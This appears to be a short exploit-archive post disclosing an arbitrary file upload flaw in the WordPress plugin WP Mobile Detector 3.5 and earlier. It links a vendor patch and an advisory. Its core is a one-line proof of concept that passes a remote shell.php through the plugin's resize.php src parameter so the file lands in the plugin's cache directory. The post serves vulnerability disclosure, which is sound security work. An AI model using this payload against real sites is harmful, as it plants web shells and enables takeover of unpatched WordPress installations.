WordPress WP Mobile Detector 3.5 Shell Upload *youtube
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress WP Mobile Detector 3.5 Shell Upload *youtube</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Hello, This Vulnerable has been disclosed to public yesterday about WP Mobile Detector Arbitrary File upload for version <=3.5 in which attacker can upload malicious PHP Files (Shell) into the Website. Over 10,000 users are affected, Vendor has released a Patch in their version 3.6 & 3.7 at https://wordpress.org/plugins/wp-mobile-detector/changelog/ .Even Sucuri has published one advisory on it. I have wrote a Complete POC post: https://aadityapurani.com/2016/06/03/mobile-detector-poc/ I have made a POC Video Here: https://www.youtube.com/watch?v=ULE1AVWfHTU Simple POC: Go to [wordpress site path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php] and it will get saved in directory /wp-content/plugins/wp-mobile-detector/cache/shell.php Warm Regards, Aaditya Purani </BODY></HTML>
